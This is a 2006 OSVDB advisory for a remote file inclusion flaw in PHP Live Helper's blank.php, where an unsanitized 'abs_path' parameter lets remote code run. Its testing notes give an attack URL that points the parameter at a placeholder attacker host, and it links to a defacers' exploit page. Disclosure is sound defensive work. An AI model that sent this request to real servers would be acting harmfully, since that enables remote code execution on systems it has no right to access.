PHP Live Helper blank.php abs_path Variable Remote File Inclusion

2006-03-26T04:47:35
ID OSVDB:24199
Type osvdb
Reporter rUnViRuS(stormhacker@hotmail.com)
Modified 2006-03-26T04:47:35

Description

Vulnerability Description

PHP Live Helper contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the blank.php script not properly sanitizing user input supplied to the 'abs_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PHP Live Helper contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the blank.php script not properly sanitizing user input supplied to the 'abs_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/blank.php?abs_path=http://[attacker]/

References:

Vendor URL: http://www.phplivehelper.com/ Secunia Advisory ID:19428 Related OSVDB ID: 24193 Related OSVDB ID: 24194 Related OSVDB ID: 24197 Related OSVDB ID: 24195 Related OSVDB ID: 24198 Related OSVDB ID: 24196 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0522.html Keyword: WD00 Generic Exploit URL: http://www.worlddefacers.de/Public/WD-TMPLH.txt FrSIRT Advisory: ADV-2006-1137 CVE-2006-1477